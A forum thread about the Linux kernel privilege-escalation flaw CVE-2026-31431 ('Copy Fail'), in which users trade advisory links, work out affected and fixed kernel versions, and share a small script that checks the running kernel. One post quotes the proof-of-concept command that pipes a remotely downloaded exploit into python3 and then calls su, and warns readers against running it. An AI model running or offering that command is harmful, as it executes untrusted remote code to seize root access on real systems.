Copy Fail - High Severity Vulnerability - CVE-2026-31431

Hi Everyone,

There is a new high severity Linux vulnerability that was silently patched with a664bf3 last month.

For those of you that don’t update your systems often, or haven’t in the past month, you will likely want to update your kernel to ensure that you’ve successfully remediated. For those of you that are system admins with minimal patch windows, you will want to prioritize this remediation.

POCs are now available for those of you that want to test if you are vulnerable. https://copy.fail/#affected

I tested on a vulnerable system and exploitation was just that easy.

Here’s a link to the original research for those of you that are curious. It’s a very interesting read: https://xint.io/blog/copy-fail-linux-distributions

People will need to update their kernel because of this once the security patch is available.

Not vulnerable. Yay :slight_smile:

Looks like this affects kernel versions from 4.14.1-1 until 6.19.12-1 according to https://security.archlinux.org/CVE-2026-31431 .

This was fixed in 6.19.12-1. If you have any version prior to this, update!

For those of you that can’t install patches, Red Hat has provided some mitigations that don’t require upgrading your kernel: https://access.redhat.com/security/cve/cve-2026-31431

What about the LTS version? I have 7.0.1 Arch, but 6.18.25 LTS.

am i vulnerable to the exploit? this is my kernel version at the moment, sorry if this is dumb to ask i’m kinda in a panic rn

Should be good @Sentry64 :+1:

The Arch Linux report for that CVE states that it was fixed with kernel 6.19.12-1.

So for anyone keeping a pretty up-to-date system, it’s actually been fixed for a couple of weeks now.

oh thank goodness, i was worried for a moment there..

thanks for the reply!


Everyone should be fine if the system is updated.

Tested on my machine and it looks to be patched on 6.18.25-1-lts

Thanks. A previous post mentioned 6.19.12-1 (without saying whether it was LTS or not) as the safe version, so I just wanted to make sure.

thank you all

I run 6.19.14-arch1-1 (64-bit) as KDE-System-Info says. What’s the proper command to get that info, please?

You should not run this on your system; also, it should not do any harm, and it should get reset with a reboot.

  1. curl https://copy.fail/exp: This downloads a script from a remote server. You have no way of knowing what is in that script without inspecting it first.
  2. | python3: This takes the downloaded script and immediately executes it using the Python interpreter. This means the code runs with your current user permissions the moment it is downloaded.
  3. && su: If the previous script succeeds, it attempts to switch to the superuser (root) account. In the context of an exploit (like the CVE mentioned in the page title), the script likely attempts to steal your password or use a vulnerability to grant the attacker root access.

The website mentions the command:

[screenshot]

I had run that on virtual machines, so you do not have to ;)

Ah, okay. Thanks, Joe. As I have a kernel above the fixed 6.19.12-1, I should be safe. :wink:
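
On the question above about getting the kernel version from a terminal: `uname -r` prints the running kernel release. The script below is an added example, not part of any post in this thread; it compares that release with 6.19.12, the fixed version the thread quotes from the Arch advisory. The function names and result labels are made up for illustration, and GNU `sort -V` is assumed.

```shell
#!/bin/sh
# Added example (not from the thread): compare a kernel release string with
# the fixed version quoted in the thread from the Arch advisory (6.19.12-1).
FIXED_VERSION="6.19.12"

# Strip the packaging suffix: "6.19.14-arch1-1" -> "6.19.14"
kernel_base() {
    printf '%s\n' "${1%%-*}"
}

# Succeeds when $1 >= $2 in version order (relies on GNU sort -V).
version_ge() {
    lowest=$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)
    [ "$lowest" = "$2" ]
}

# Prints "at-or-above-fix" or "check-advisory" for a release string.
classify_kernel() {
    base=$(kernel_base "$1")
    if version_ge "$base" "$FIXED_VERSION"; then
        echo "at-or-above-fix"
    else
        # An older series (an LTS kernel, for example) can carry a backported
        # fix, so the version number alone does not decide; check the
        # distribution's advisory for that package.
        echo "check-advisory"
    fi
}

# Report on the kernel that is running right now.
running=$(uname -r)
echo "$running: $(classify_kernel "$running")"
```

A `check-advisory` result does not mean the system is vulnerable; it means the package version has to be looked up in the distribution's advisory, as with the 6.18.25 LTS kernel discussed above.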